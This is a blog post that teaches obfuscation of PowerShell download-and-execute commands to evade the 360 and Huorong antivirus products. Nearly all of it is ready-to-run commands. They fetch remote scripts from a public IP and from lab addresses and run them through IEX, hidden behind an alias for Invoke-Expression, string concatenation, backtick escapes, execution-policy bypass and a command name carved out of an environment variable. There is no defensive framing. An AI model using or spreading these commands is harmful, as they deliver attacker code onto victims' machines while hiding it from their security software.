PowerShell obfuscation for AV evasion: bypassing 360 and Huorong


Final result


Windows 10:

echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10'+'1.34.38.1'+'89/a') | %psmodulepath:~24,10% -

Other systems:

echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10'+'1.34.38.1'+'89/a') | powershell -

1. Script file on disk

Read the script locally and feed it to PowerShell through a pipe (the trailing "-" tells PowerShell to read commands from stdin):

powershell Get-Content 1.ps1 | powershell -NoProfile -

Bypass the execution policy with -ExecutionPolicy bypass:

powershell -ExecutionPolicy bypass -File ./1.ps1

The Unrestricted execution policy flag:

powershell -ExecutionPolicy unrestricted -File ./1.ps1

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://101.34.38.189:80/a'))"

2. Fileless (nothing written to disk)

1. Set an alias for iex

iex => Invoke-Expression

set-alias -name hhh -value IEX

powershell set-alias -name hhh -value IEX;hhh(New-Object Net.WebClient).DownloadString('http://192.168.1.1/123.txt')

powershell set-alias -name cseroad -value Invoke-Expression;cseroad(New-Object Net.WebClient).DownloadString('http://192.168.10.26:88/a/payload.ps1')

2. Use echo to pass the download cradle on stdin; the script is downloaded and run through IEX

echo Invoke-Expression(new-object net.webclient).downloadstring('http://192.168.10.26:88/a/payload.ps1') | powershell -

3. On Windows 10, carve the word "powershell" out of an environment variable. cmd.exe's %VAR:~offset,length% syntax returns a substring of a variable; the default system PSModulePath begins with C:\Program Files\WindowsPowerShell\Modules, so characters 24 to 33 spell "PowerShell", and the command name never appears literally on the command line:

%psmodulepath:~24,10%

4. Variable concatenation

$b1='invoke-Ex';$b2='pression';$a1='((new-object net.webclient).downl';$a2='oadstring(''http://192.168.0.104:80/a''))';$a3=$b1,$b2,$a1,$a2;iex(-join $a3)

5. '+' concatenation combined with variables

powershell "$b='(new-object net.webclient).downlo';$a='adstring(''http://192.168.1.1/payload.ps1'')';IEX ($b+$a)"

6. Insert backticks into strings. The PowerShell team chose the backtick as the escape character; a backtick in front of a character that is not one of the defined escapes is simply dropped, so "Down`l`oadStr`ing" is still read as DownloadString while the literal keyword no longer appears in the command. The defined escapes are:

`'  single quote
`"  double quote
`0  null
`a  alert (bell)
`b  backspace
`f  form feed
`n  new line
`r  carriage return
`t  horizontal tab
`v  vertical tab

echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10'+'1.34.38.1'+'89/a') | %psmodulepath:~24,10% -

echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10'+'1.34.38.1'+'89/a') | powershell -


posted @ 2021-08-14 10:06 bingtanghulu